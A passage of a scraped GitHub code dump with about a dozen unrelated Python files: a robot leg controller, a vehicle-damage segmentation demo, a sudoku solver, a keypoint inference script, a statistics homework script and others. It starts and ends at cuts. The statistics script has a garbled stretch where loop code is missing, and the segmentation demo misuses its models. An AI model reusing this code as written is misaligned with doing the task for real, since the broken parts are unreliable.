TODO(b/143378213): Calculate the foot_target_position\n # in world frame and then project back to calculate the joint angles.\n hip_offset = hip_positions[leg_id]\n twisting_vector = np.array((-hip_offset[1], hip_offset[0], 0))\n hip_horizontal_velocity = com_velocity + yaw_dot * twisting_vector\n target_hip_horizontal_velocity = (\n self.desired_speed + self.desired_twisting_speed * twisting_vector)\n if self.use_raibert_heuristic or (\n not self.foot_placement_position.any()):\n # Use raibert heuristic to determine target foot position\n foot_target_position = (\n hip_horizontal_velocity *\n self._gait_generator.stance_duration[leg_id] / 2 - _KP *\n (target_hip_horizontal_velocity - hip_horizontal_velocity))\n foot_target_position = np.clip(foot_target_position,\n [-0.15, -0.1, -0.05], [0.15, 0.1, 0.05])\n foot_target_position = foot_target_position - \\\n self._desired_landing_height + \\\n np.array((hip_offset[0], hip_offset[1], 0))\n else:\n foot_target_position = self.foot_placement_position[\n leg_id] - self._desired_landing_height + np.array(\n (hip_offset[0], hip_offset[1], 0))\n\n # Compute target position compensation due to slope\n gravity_projection_vector = \\\n self._state_estimator.gravity_projection_vector\n multiplier = -self._desired_landing_height[\n 2] / gravity_projection_vector[2]\n foot_target_position[:2] += gravity_projection_vector[:2] * multiplier\n # logging.info(\"Compsenation: {}\".format(gravity_projection_vector[:2] *\n # multiplier))\n\n foot_position = _gen_swing_foot_trajectory(\n self._gait_generator.normalized_phase[leg_id],\n self._phase_switch_foot_local_position[leg_id], foot_target_position,\n self._foot_height)\n\n joint_ids, joint_angles = (\n self._robot.get_motor_angles_from_foot_position(\n leg_id, foot_position))\n # Update the stored joint angles as needed.\n for joint_id, joint_angle in zip(joint_ids, joint_angles):\n all_joint_angles[joint_id] = (joint_angle, leg_id)\n action = {}\n kps = self._robot.motor_group.kps\n kds = self._robot.motor_group.kds\n for joint_id, joint_angle_leg_id in all_joint_angles.items():\n leg_id = joint_angle_leg_id[1]\n action[joint_id] = MotorCommand(desired_position=joint_angle_leg_id[0],\n kp=kps[joint_id],\n desired_velocity=0,\n kd=kds[joint_id],\n desired_extra_torque=0)\n\n return action\n","repo_name":"yxyang/fast_and_efficient","sub_path":"src/convex_mpc_controller/raibert_swing_leg_controller.py","file_name":"raibert_swing_leg_controller.py","file_ext":"py","file_size_in_byte":10319,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"72"} +{"seq_id":"4109434298","text":"\n\ndef _get_caches_with_video_id(cache_descriptions, video_id):\n cache_ids = []\n for cache_id, video_ids in cache_descriptions.items():\n if video_id in video_ids:\n cache_ids.append(cache_id)\n return cache_ids\n\n\ndef _count_score(requests, endpoints, cache_descriptions):\n score = 0\n total_requests = 0\n for request in requests:\n endpoint = endpoints[request.endpoint_id]\n cache_ids = _get_caches_with_video_id(cache_descriptions, request.video_id)\n latencies = [endpoint.data_center_latency]\n for cache_id in cache_ids:\n if cache_id in endpoint.cache_latencies:\n latencies.append(endpoint.cache_latencies[cache_id])\n latency_diff = endpoint.data_center_latency - min(latencies)\n score += request.count * latency_diff\n total_requests += request.count\n return (score * 1000) // total_requests\n\n\ndef count_score(input, output):\n return _count_score(input.requests, input.endpoints, 
output)\n","repo_name":"dream-team-poland/gh2017q","sub_path":"src/score.py","file_name":"score.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8075949588","text":"import gradio as gr\nimport numpy as np\nimport torch\nfrom PIL import Image, ImageDraw\nimport requests\nfrom transformers import SamModel, SamProcessor\nfrom transformers import CLIPSegProcessor, CLIPSegForImageSegmentation\nimport cv2\nfrom typing import List\n\ndevice = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n\n#Load clipseg Model\nclip_processor = CLIPSegProcessor.from_pretrained(\"CIDAS/clipseg-rd64-refined\")\nclip_model = CLIPSegForImageSegmentation.from_pretrained(\"CIDAS/clipseg-rd64-refined\").to(device)\n\n# Load SAM model and processor\nmodel = SamModel.from_pretrained(\"facebook/sam-vit-base\").to(device)\nprocessor = SamProcessor.from_pretrained(\"facebook/sam-vit-base\")\n\ncache_data = None\n\n# Prompts to segment damaged area and car\nprompts = ['damaged', 'car']\ndamage_threshold = 0.4\nvehicle_threshold = 0.5\n\ndef bbox_normalization(bbox, width, height):\n height_coeff = height/352\n width_coeff = width/352\n normalized_bbox = [int(bbox[0]*width_coeff), int(bbox[1]*height_coeff),\n int(bbox[2]*width_coeff), int(bbox[3]*height_coeff)]\n return normalized_bbox\n\ndef bbox_area(bbox):\n area = (bbox[2]-bbox[0])*(bbox[3]-bbox[1])\n return area\n\ndef segment_to_bbox(segment_indexs):\n x_points = []\n y_points = []\n for y, list_val in enumerate(segment_indexs):\n for x, val in enumerate(list_val):\n if val == 1:\n x_points.append(x)\n y_points.append(y)\n return [np.min(x_points), np.min(y_points), np.max(x_points), np.max(y_points)]\n\ndef clipseg_prediction(image):\n inputs = processor(text=prompts, images=[image] * len(prompts), padding=\"max_length\", return_tensors=\"pt\")\n # predict\n with torch.no_grad():\n outputs = model(**inputs)\n preds = outputs.logits.unsqueeze(1)\n # Setting threshold and classify the image contains vehicle or not\n flat_preds = torch.sigmoid(preds.squeeze()).reshape((preds.shape[0], -1))\n\n # Initialize a dummy \"unlabeled\" mask with the threshold\n flat_damage_preds_with_treshold = torch.full((2, flat_preds.shape[-1]), damage_threshold)\n flat_vehicle_preds_with_treshold = torch.full((2, flat_preds.shape[-1]), vehicle_threshold)\n flat_damage_preds_with_treshold[1:2,:] = flat_preds[0] # damage\n flat_vehicle_preds_with_treshold[1:2,:] = flat_preds[1] # vehicle\n\n # Get the top mask index for each pixel\n damage_inds = torch.topk(flat_damage_preds_with_treshold, 1, dim=0).indices.reshape((preds.shape[-2], preds.shape[-1]))\n vehicle_inds = torch.topk(flat_vehicle_preds_with_treshold, 1, dim=0).indices.reshape((preds.shape[-2], preds.shape[-1]))\n\n # bbox creation\n damage_bbox = segment_to_bbox(damage_inds)\n vehicle_bbox = segment_to_bbox(vehicle_inds)\n\n # Vehicle checking\n if bbox_area(vehicle_bbox) > bbox_area(damage_bbox):\n return True, bbox_normalization(damage_bbox)\n else:\n return False, []\n \n\n@torch.no_grad()\ndef foward_pass(image_input: np.ndarray, points: List[List[int]]) -> np.ndarray:\n global cache_data\n image_input = Image.fromarray(image_input)\n inputs = processor(image_input, input_points=points, return_tensors=\"pt\").to(device)\n if not cache_data or not torch.equal(inputs['pixel_values'],cache_data[0]):\n embedding = model.get_image_embeddings(inputs[\"pixel_values\"])\n pixels = inputs[\"pixel_values\"]\n cache_data = [pixels, 
embedding]\n del inputs[\"pixel_values\"]\n\n outputs = model.forward(image_embeddings=cache_data[1], **inputs)\n masks = processor.image_processor.post_process_masks(\n outputs.pred_masks.cpu(), inputs[\"original_sizes\"].cpu(), inputs[\"reshaped_input_sizes\"].cpu()\n )\n masks = masks[0].squeeze(0).numpy().transpose(1, 2, 0)\n\n return masks\n\ndef main_func(inputs):\n \n image_input = inputs['image']\n classification, points = clipseg_prediction(image_input)\n if classification:\n masks = foward_pass(image_input, points)\n \n image_input = Image.fromarray(image_input)\n \n final_mask = masks[0]\n mask_colors = np.zeros((final_mask.shape[0], final_mask.shape[1], 3), dtype=np.uint8)\n mask_colors[final_mask, :] = np.array([[128, 0, 0]])\n return Image.fromarray((mask_colors * 0.6 + image_input * 0.4).astype('uint8'), 'RGB')\n else:\n return Image.fromarray(image_input)\n\ndef reset_data():\n global cache_data\n cache_data = None\n\nwith gr.Blocks() as demo:\n gr.Markdown(\"# Demo to run Vehicle damage detection\")\n gr.Markdown(\"\"\"This app uses the SAM model and clipseg model to get a vehicle damage area from image.\"\"\")\n with gr.Row():\n image_input = gr.Image()\n image_output = gr.Image()\n \n image_button = gr.Button(\"Segment Image\", variant='primary')\n\n image_button.click(main_func, inputs=image_input, outputs=image_output)\n image_input.upload(reset_data)\n\ndemo.launch()\n","repo_name":"abijithraaz/Vehicle-damage-detection","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15696065832","text":"import codecs\nimport json\nimport os\nfrom html.parser import HTMLParser\n\nDEVICE_TWEETS_DIR = './data/selected/device-tweets'\n\n\nclass LinkParser(HTMLParser):\n def __init__(self):\n\n HTMLParser.__init__(self)\n self.links = {}\n self.linkurl = ''\n\n def handle_starttag(self, tag, attrs):\n\n if tag == 'a':\n attrs = dict(attrs)\n if 'href' in attrs:\n self.linkurl = attrs['href']\n\n def handle_data(self, data):\n\n if self.linkurl:\n self.links[self.linkurl] = data\n self.linkurl = ''\n\n\ndef main():\n parser = LinkParser()\n\n for year in os.listdir(DEVICE_TWEETS_DIR):\n\n lang_year_path = os.path.join(DEVICE_TWEETS_DIR, year)\n\n for month in os.listdir(lang_year_path):\n\n lang_month_path = os.path.join(lang_year_path, month)\n\n for file in os.listdir(lang_month_path):\n\n file_path = os.path.join(lang_month_path, file)\n with codecs.open(file_path, 'r+') as f:\n tweets = json.load(f)\n for i in range(len(tweets['tweets'])):\n parser.feed(tweets['tweets'][i]['source'])\n tweets['tweets'][i]['source'] = \\\n list(parser.links.copy().values())[0]\n parser.links.clear()\n\n for i in range(len(tweets['stats'])):\n stat = []\n for k, v in tweets['stats'][i]['device_stat'].items():\n parser.feed(k)\n stat.append(\n {'source': list(parser.links.copy().values())[\n 0], 'count': v})\n parser.links.clear()\n\n tweets['stats'][i]['device_stat'] = stat\n\n f.seek(0)\n json.dump(tweets, f, ensure_ascii=False)\n f.truncate()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"hakatashi/emoji-vision","sub_path":"parse_link.py","file_name":"parse_link.py","file_ext":"py","file_size_in_byte":2025,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"13493641778","text":"from pprint import pprint as pp\n\nVALID_DIGITS = {\"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", 
\"9\"}\n\ndef solve_sudoku(sudoku):\n def _get_row(coords):\n row_index, _ = coords\n return set(sudoku[row_index])\n\n def _get_column(coords):\n _, col_index = coords\n return {r[col_index] for r in sudoku}\n\n def _3_by_3_coords(coords):\n def _(idx):\n if 0 <= idx <= 2:\n result = (0, 3)\n elif 3 <= idx <= 5:\n result = (3, 6)\n else:\n result = (6, 9)\n return result\n row_idx, col_idx = coords\n return _(row_idx), _(col_idx)\n\n def _get_3_by_3(coords):\n row_index, col_index = coords\n assert 0 <= row_index <= 8 and 0 <= col_index <= 8\n\n _3_by_3_rows, _3_by_3_cols = _3_by_3_coords(coords)\n\n _3_by_3 = set()\n for i in range(*_3_by_3_rows):\n for j in range(*_3_by_3_cols):\n _3_by_3.add(sudoku[i][j])\n\n return _3_by_3\n\n def _construct_possibilities_hashtable():\n hashtable = {}\n next_pick = []\n for i in range(len(sudoku)):\n for j in range(len(sudoku[0])):\n if sudoku[i][j] != \"0\":\n continue\n\n temp1 = VALID_DIGITS - set(filter(lambda x: x != 0, _get_row((i, j))))\n temp2 = VALID_DIGITS - set(filter(lambda x: x != 0, _get_column((i, j))))\n temp3 = VALID_DIGITS - set(filter(lambda x: x != 0, _get_3_by_3((i, j))))\n\n hashtable[(i, j)] = temp1.intersection(temp2, temp3)\n if len(hashtable[(i, j)]) == 1:\n next_pick.append((i, j))\n\n return hashtable, next_pick\n\n possibilities, coords_to_be_picked = _construct_possibilities_hashtable()\n\n while coords_to_be_picked:\n coord = coords_to_be_picked.pop(0)\n only_possibility = possibilities[coord].pop()\n sudoku[coord[0]][coord[1]] = only_possibility\n\n for row in range(9):\n temp_coord = (row, coord[1])\n if temp_coord not in possibilities or temp_coord in coords_to_be_picked:\n continue\n\n possibilities[temp_coord].discard(only_possibility)\n if len(possibilities[temp_coord]) == 1:\n coords_to_be_picked.append(temp_coord)\n\n for column in range(9):\n temp_coord = (coord[0], column)\n if temp_coord not in possibilities or temp_coord in coords_to_be_picked:\n continue\n\n possibilities[temp_coord].discard(only_possibility)\n if len(possibilities[temp_coord]) == 1:\n coords_to_be_picked.append(temp_coord)\n\n _3_by_3_rows, _3_by_3_cols = _3_by_3_coords(coord)\n\n for i in range(*_3_by_3_rows):\n for j in range(*_3_by_3_cols):\n if (i, j) not in possibilities or (i, j) in coords_to_be_picked:\n continue\n possibilities[(i, j)].discard(only_possibility)\n if len(possibilities[(i, j)]) == 1:\n coords_to_be_picked.append((i, j))\n\n\nif __name__ == \"__main__\":\n board = [[\"5\", \"3\", \"0\", \"0\", \"7\", \"0\", \"0\", \"0\", \"0\"],\n [\"6\", \"0\", \"0\", \"1\", \"9\", \"5\", \"0\", \"0\", \"0\"],\n [\"0\", \"9\", \"8\", \"0\", \"0\", \"0\", \"0\", \"6\", \"0\"],\n [\"8\", \"0\", \"0\", \"0\", \"6\", \"0\", \"0\", \"0\", \"3\"],\n [\"4\", \"0\", \"0\", \"8\", \"0\", \"3\", \"0\", \"0\", \"1\"],\n [\"7\", \"0\", \"0\", \"0\", \"2\", \"0\", \"0\", \"0\", \"6\"],\n [\"0\", \"6\", \"0\", \"0\", \"0\", \"0\", \"2\", \"8\", \"0\"],\n [\"0\", \"0\", \"0\", \"4\", \"1\", \"9\", \"0\", \"0\", \"5\"],\n [\"0\", \"0\", \"0\", \"0\", \"8\", \"0\", \"0\", \"7\", \"9\"]]\n\n solve_sudoku(board)\n pp(board)\n\n","repo_name":"InderdeepSync/algoexpert_problems","sub_path":"solve_sudoku.py","file_name":"solve_sudoku.py","file_ext":"py","file_size_in_byte":3727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40422747574","text":"#l = [(2, 5), (1, 2), (4, 4), (2, 3), (2, 1)]\r\nl =[]\r\nn = int(input(\"length of list:\"))\r\nfor i in range(n):\r\n k =[]\r\n for j in range(2):\r\n 
k.append(int(input(\"enter tuple elements\")))\r\n l.append(tuple(k))\r\nprint(l)\r\ni =0\r\nj=0\r\nwhile j < len(l):\r\n for i in range(len(l)-1):\r\n if(l[i][1] > l[i+1][1]):\r\n temp =l[i]\r\n l[i] = l[i+1]\r\n l[i+1] = temp\r\n j+=1\r\nprint(l)","repo_name":"Sejarla/EdYoda-Assignments","sub_path":"assignment2.1.py","file_name":"assignment2.1.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40695303665","text":"import os\nimport torch\nimport pytorch_lightning as pl\n\nfrom torch.utils.data.dataloader import DataLoader\n\nfrom model import GeneratorModel, Encoder, RationaleSystem\n\nfrom argparse import ArgumentParser\n\n\nfrom torchtext.data import Field, BucketIterator\nfrom torchtext.datasets import IMDB\nfrom torchtext.vocab import FastText\nfrom pytorch_lightning.callbacks.early_stopping import EarlyStopping\n\nfrom data import IMDBDataModule\n\ndef general_args():\n ap = ArgumentParser()\n \n ap.add_argument(\"--no-generator\", action=\"store_true\", default=False)\n\n ap.add_argument('--learning-rate', type=float, default=1e-3)\n ap.add_argument(\"--batch-size\", type=int, default=32)\n\n ap.add_argument(\"--rnn-type\", type=str, choices=['gru','cnn'])\n\n ap.add_argument('--rnn-layers', type=int, default=2)\n ap.add_argument('--rnn-dim', type=int, default=128)\n ap.add_argument('--dropout', type=float, default=0.2)\n\n ap.add_argument(\"--cnn-filters\", type=str, default=\"3,4,5\")\n\n ap.add_argument(\"--patience\", default=3, type=int)\n \n\n ap.add_argument(\"--neptune-project\", type=str, default=None)\n ap.add_argument(\"--neptune-key\", type=str, default=None)\n\n return ap\n\ndef main():\n parser = general_args()\n parser = pl.Trainer.add_argparse_args(parser)\n parser = RationaleSystem.add_model_specific_args(parser)\n \n\n args = parser.parse_args()\n\n neptune_logger = None\n\n if args.neptune_project is not None:\n from pytorch_lightning.loggers.neptune import NeptuneLogger\n\n neptune_logger = NeptuneLogger(\n api_key=args.neptune_key,\n project_name=args.neptune_project,\n params=vars(args)\n )\n\n \n\n data = IMDBDataModule(args.batch_size)\n data.prepare_data()\n\n # if args.no_generator:\n # gen = None\n # else:\n # gen = GeneratorModel(args, \n # embeddings=data.text_field.vocab.vectors, \n # padding_idx=data.text_field.vocab.stoi[''])\n\n\n # enc = Encoder(args,\n # embeddings=data.text_field.vocab.vectors, \n # num_classes=len(data.label_field.vocab), \n # padding_idx=data.text_field.vocab.stoi[''])\n\n model = RationaleSystem(args, embeddings=data.text_field.vocab.vectors, \n num_classes=len(data.label_field.vocab), \n padding_idx=data.text_field.vocab.stoi[''])\n\n checkpoint_callback = pl.callbacks.ModelCheckpoint(\n filepath=os.getcwd(),\n save_top_k=3,\n save_weights_only=True,\n verbose=True,\n monitor='val_acc',\n mode='max',\n prefix=''\n )\n\n earlystop_callback = EarlyStopping(monitor='val_acc', patience=args.patience)\n\n\n trainer = pl.Trainer.from_argparse_args(args, callbacks=[checkpoint_callback, earlystop_callback], logger=neptune_logger)\n\n trainer.fit(model, data)\n\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"ravenscroftj/roberta-rationale-extraction","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41913435193","text":"from ugens.ugen import Ugen, ugen_parser\nimport sys\n\ndef 
add(inputs):\n if all([type(k) in (Ugen, str, float) for k in inputs]):\n print('types', len(inputs)//4, inputs)\n while len(inputs)>1:\n inputs_ = []\n for x in range(0, len(inputs), 4):\n inputs_.append(inputs[x:x+4])\n inputs = inputs_\n print('inputs', inputs)\n\nif __name__ == '__main__':\n\n args_def = {\n \"in\":{\n \"help\": \"The array of channels or arrays.\",\n \"default\":None,\n \"nargs\": '+'\n }\n }\n\n parse = ugen_parser(args_def)\n\n if len(sys.argv[1:])==1:\n print(sys.argv[1:][0],file=sys.stderr)\n else:\n argv = ['0', '--in']\n\n for arg in sys.argv[1:]:\n argv.append(arg)\n\n args = parse(argv)\n add(args['in'])\n print(args)\n\n\n","repo_name":"rexmalebka/bash_sc","sub_path":"ugens/operators/add.py","file_name":"add.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40824361797","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Mar 25 23:28:19 2022\n\n@author: a975193\n\"\"\"\n\nimport cv2\nimport time\nimport glob\nimport numpy as np\nimport tensorflow.compat.v1 as tf\n\ninput_folder = \"dataset/images/\"\nmodel_path = \"saved_model/saved_model\"\noutput_folder = \"output_folder/\"\n\ncolors = [(255,0,0), (229, 52, 235), (235, 85, 52),\n (14, 115, 51), (14, 115, 204)]\n\ncv2.namedWindow(\"display\", cv2.WINDOW_NORMAL)\n\ndef process_keypoint(kp, kp_s, h, w, img):\n for i, kp_data in enumerate(kp):\n cv2.circle(img,(int(kp_data[1]*w), int(kp_data[0]*h)),5,colors[i],-1)\n return img\n\nwith tf.Session(graph = tf.Graph()) as sess:\n tf.saved_model.loader.load(sess, ['serve'], model_path)\n graph = tf.get_default_graph()\n input_tensor = graph.get_tensor_by_name(\"serving_default_input_tensor:0\")\n det_score = graph.get_tensor_by_name(\"StatefulPartitionedCall:6\")\n det_class = graph.get_tensor_by_name(\"StatefulPartitionedCall:2\")\n det_boxes = graph.get_tensor_by_name(\"StatefulPartitionedCall:0\")\n det_numbs = graph.get_tensor_by_name(\"StatefulPartitionedCall:7\")\n det_keypoint = graph.get_tensor_by_name(\"StatefulPartitionedCall:4\")\n det_keypoint_score = graph.get_tensor_by_name(\"StatefulPartitionedCall:3\")\n print(\"Model Loaded\")\n for image_path in glob.glob(input_folder+\"*.jpg\"):\n filename = image_path.split(\"/\")[-1]\n frame = cv2.imread(image_path)\n if frame is not None:\n frame = cv2.resize(frame,(512,512),interpolation = cv2.INTER_AREA)\n height, width, _ = frame.shape\n image_exp_dims = np.expand_dims(frame, axis=0)\n start_time = time.time()\n score,classes,boxes,nums_det, \\\n keypoint,keypoint_score = sess.run([det_score, det_class, det_boxes, \n det_numbs,det_keypoint,det_keypoint_score], \n feed_dict={input_tensor:image_exp_dims})\n for i in range(int(nums_det[0])):\n if(score[0][i]*100 > 50): \n per_box = boxes[0][i]\n y1 = int(per_box[0]*height)\n x1 = int(per_box[1]*width)\n y2 = int(per_box[2]*height)\n x2 = int(per_box[3]*width)\n \n p1 = (x1,y1)\n p2 = (x2,y2)\n cv2.rectangle(frame, p1, p2, (0,255,0), 3)\n frame = process_keypoint(keypoint[0][0], keypoint_score[0], height, width, frame)\n cv2.imshow(\"display\",frame)\n cv2.imwrite(output_folder+filename, frame)\n print(\"Time: \", time.time() - start_time)\n cv2.waitKey(1)\n else:\n print(\"break\")\n 
break\ncv2.destroyAllWindows()","repo_name":"prabhakar-sivanesan/Custom-keypoint-detection","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":2802,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"72"} +{"seq_id":"32632921750","text":"\n###################### Exercise 1 ##############################\n'''\nWrite a Python program that prints the square roots of the\nmultiples of 3 in the following list of values:\nlista = [10,33,9,14,18,114,12,21,50,55,60]\n'''\n\n# IMPORT LIBRARY\nfrom math import sqrt\n# INPUT\n\nlista = [10,33,9,14,18,114,12,21,50,55,60]\nmultiplosDeTres = []\nraizCuadrada = []\n# PROCESSING\n\nfor i in range(len(lista)):\n    # if the value is divisible by 3, compute its square root\n    if lista[i] % 3 == 0:\n        multiplosDeTres.append(lista[i])\n        raizCuadrada.append(round(sqrt(lista[i]), 3))\n\n# OUTPUT\nprint('De la lista:', lista,'los multiples de 3 son:',multiplosDeTres,'y la raiz cuadrada de estos elementos es:',raizCuadrada)\n\n\n\n###################### Exercise 2 ##############################\n'''\nWrite a Python program that simulates the draw of a game of\nchance such as LOTO or KINO\n'''\n\n# IMPORT LIBRARY\nfrom random import sample\n# INPUT\n# generate the drawn numbers\nlistaLoto = sorted(sample(range(1,41),6))\nlistaKino = sorted(sample(range(1,25),14))\n# numbers played\nnumerosLoto = sorted(sample(range(1,41),6))\nnumerosKino = sorted(sample(range(1,25),14))\n\n# PROCESSING\naciertosLoto = 0\nfor i in range(len(numerosLoto)):\n    if numerosLoto[i] in listaLoto:\n        aciertosLoto +=1\n\naciertosKino = 0\nfor i in range(len(numerosKino)):\n    if numerosKino[i] in listaKino:\n        aciertosKino +=1\n\n# OUTPUT\nprint('Juego Loto')\nprint('Dado los numeros del sorteo de Loto: ',listaLoto, 'Se jugaron los siguientes numeros',numerosLoto, 'Obteniendo',aciertosLoto,'aciertos' )\n\nprint('Juego Kino')\nprint('Dado los numeros del sorteo de Kino: ',listaKino, 'Se jugaron los siguientes numeros',numerosKino, 'Obteniendo',aciertosKino,'aciertos' )\n\n\n\n###################### Exercise 3 ##############################\n'''\nWrite a Python program that receives as input a set of values\nseparated by the space character and returns the mean and the\nstandard deviation of those values\n'''\n\n# INPUT\n# prompt for the data\ninformacion = input('Ingrese los datos separados por espacio [Ejemplo: 1 2 3 4]\\n')\n\n# split the input on \" \"\nnotas = []\nfor i in [n for n in informacion.split(\" \")]:\n    notas.append(float(i))\n\n# PROCESSING\n\n# mean of the values\ndef promedio(numeros):\n    promedio = sum(numeros) / len(numeros)\n    return round(promedio,2)\n\n# standard deviation\ndef desvEst(numeros):\n    numero = [float(i) for i in numeros]\n    media = promedio(numeros)\n    desviacion=0\n    for i in range(0,len(numeros)):\n        dif = ((numero[i] - media)**2)/ len(numeros) \n        desviacion=dif+desviacion\n    # the loop accumulates the variance; the standard deviation is its square root\n    return round(sqrt(desviacion), 2)\n\n# OUTPUT\nprint(\"los datos ingresados son:\", notas)\nprint(\"El promedio para los datos ingresados es:\", promedio(notas))\nprint(\"La desviacion estandar para los datos ingresados es:\", desvEst(notas))
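\n\n# Quick sanity check (editor's addition, illustrative only):\n# promedio([2.0, 4.0, 6.0])  # -> 4.0\n# desvEst([2.0, 4.0, 6.0])   # -> 1.63, the population standard deviation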
+{"seq_id":"16098807248","text":"import json\nimport hw_2_ch3.data_cleaner as dclean\nimport numpy as np\n#\n# q2_name_list = [\"Australia\", \"Brazil\", \"England\", \"Japan\", \"Korea\", \"Mexico\", \"Norway\", \"Sweden\", \"Taiwan\", \"United States\"]\n# q2_num_list = [2,1,1,2,9,1,1,2,2,4]\n# data_list = [tpl for tpl in zip(q2_num_list, q2_name_list)]\n\n\n# data_dict = {k:v for k,v in zip(q2_name_list,q2_num_list)}\n\ndef get_mean(data:list):\n mean = (sum(data)/len(data))\n print(\"The mean of the data set is {}/{} = {}\".format(sum(data),len(data), mean))\n return mean\n\ndef _segment_median(data:list, strt:int, stp:int):\n lo = int(np.floor((strt+stp)/2))\n hi = int(np.ceil((strt+stp)/2))\n return (data[lo]+data[hi])/2, int((lo+hi)/2)\n\ndef get_median(data:list):\n med, midx = _segment_median(data,0,len(data))\n\n quart1,q1idx = _segment_median(data,0,midx)\n quart3, q3idx = _segment_median(data,midx, len(data))\n iqr = quart3 - quart1\n return (quart1,q1idx), (med, midx), (quart3,q3idx), iqr\n\nif __name__ == \"__main__\":\n dcleaner = dclean.DataClean()\n data_list = dcleaner.get_data()\n data_list = [int(x) for x in data_list]\n # print(json.dumps(data_dict, indent=4))\n data_list.sort()\n mean_q2 = 0\n print(\"the cleaned up data_list is as follow:\\n\\t{}\".format(data_list))\n\n mean1 = get_mean(data_list)\n quart1, med, quart3, iqr = get_median(data_list)\n\n print(\"the median for this data set is {}\".format(med[0]))\n print(\"quartile 1 = {}, quartile 3 = {}, irq = {}\".format(quart1[0], quart3[0], iqr))\n outliers = []\n upper_bound = quart3[0] + iqr*1.5\n lower_bound = quart1[0] - iqr*1.5\n tarpos = 0\n target = data_list[tarpos]\n while target upper_bound and tarpos >= 0:\n tarpos -= 1\n target = data_list[tarpos]\n upper_bound = target\n for val in data_list:\n if val > upper_bound or val < lower_bound:\n outliers.append(val)\n print(\"the boundary values are [{}, {}]\".format(lower_bound,upper_bound))\n print(\"the outliers are:\\n\\t{}\".format(outliers))\n if len(outliers) > 0:\n trunc_data = [val for val in data_list if val not in outliers]\n mean2 = get_mean(trunc_data)\n q1,m,q3,tiqr = get_median(trunc_data)\n print(\"the median for this data set is {}\".format(m[0]))\n","repo_name":"RyanCPeters/UWB_FALL_2018","sub_path":"stmath341_stats/custom_code_tools/hw_2_ch3/q2.py","file_name":"q2.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4864589746","text":"# this is the parent class that has all the attributes to be inherited by the child classes.\nimport csv\nclass Users:\n def __init__(self, fname='', lname='', user_id='', user_pin='', phone_no=''):\n self.fname = fname # first name\n self.lname = lname # last name\n self.user_id = user_id # unique identifier for the user\n self.user_pin = user_pin # unique password for each user\n self.phone_no = phone_no # contact of the user\n\n# using this class we will be creating objects of the agents that will be using this platform\n# this class inherits its attributes from the User class\n\n\nclass Agents(Users):\n # in this constructor we initialize the attributes that the agent will we having and use the super innit to inherit\n def __init__(self, fname='', lname='', user_id='', user_pin='', phone_no=''):\n super().__init__(fname, lname, user_id, user_pin, phone_no)\n self.houses = []\n\n# this method returns the houses for a particular agent that is stored in the self.houses\n def get_house(self, user_ID):\n # 
\nif __name__ == \"__main__\":\n    dcleaner = dclean.DataClean()\n    data_list = dcleaner.get_data()\n    data_list = [int(x) for x in data_list]\n    # print(json.dumps(data_dict, indent=4))\n    data_list.sort()\n    mean_q2 = 0\n    print(\"the cleaned up data_list is as follows:\\n\\t{}\".format(data_list))\n\n    mean1 = get_mean(data_list)\n    quart1, med, quart3, iqr = get_median(data_list)\n\n    print(\"the median for this data set is {}\".format(med[0]))\n    print(\"quartile 1 = {}, quartile 3 = {}, iqr = {}\".format(quart1[0], quart3[0], iqr))\n    outliers = []\n    upper_bound = quart3[0] + iqr*1.5\n    lower_bound = quart1[0] - iqr*1.5\n    # snap the whisker bounds to the nearest values actually present in the data\n    tarpos = 0\n    target = data_list[tarpos]\n    while target < lower_bound and tarpos < len(data_list) - 1:\n        tarpos += 1\n        target = data_list[tarpos]\n        lower_bound = target\n    tarpos = len(data_list) - 1\n    target = data_list[tarpos]\n    while target > upper_bound and tarpos >= 0:\n        tarpos -= 1\n        target = data_list[tarpos]\n        upper_bound = target\n    for val in data_list:\n        if val > upper_bound or val < lower_bound:\n            outliers.append(val)\n    print(\"the boundary values are [{}, {}]\".format(lower_bound,upper_bound))\n    print(\"the outliers are:\\n\\t{}\".format(outliers))\n    if len(outliers) > 0:\n        trunc_data = [val for val in data_list if val not in outliers]\n        mean2 = get_mean(trunc_data)\n        q1,m,q3,tiqr = get_median(trunc_data)\n        print(\"the median for this data set is {}\".format(m[0]))\n","repo_name":"RyanCPeters/UWB_FALL_2018","sub_path":"stmath341_stats/custom_code_tools/hw_2_ch3/q2.py","file_name":"q2.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4864589746","text":"# this is the parent class that holds all the attributes to be inherited by the child classes.\nimport csv\nclass Users:\n    def __init__(self, fname='', lname='', user_id='', user_pin='', phone_no=''):\n        self.fname = fname  # first name\n        self.lname = lname  # last name\n        self.user_id = user_id  # unique identifier for the user\n        self.user_pin = user_pin  # unique password for each user\n        self.phone_no = phone_no  # contact of the user\n\n# this class creates the agent objects that use this platform;\n# it inherits its attributes from the Users class\n\n\nclass Agents(Users):\n    # this constructor initializes the attributes an agent will have, using super() to inherit them\n    def 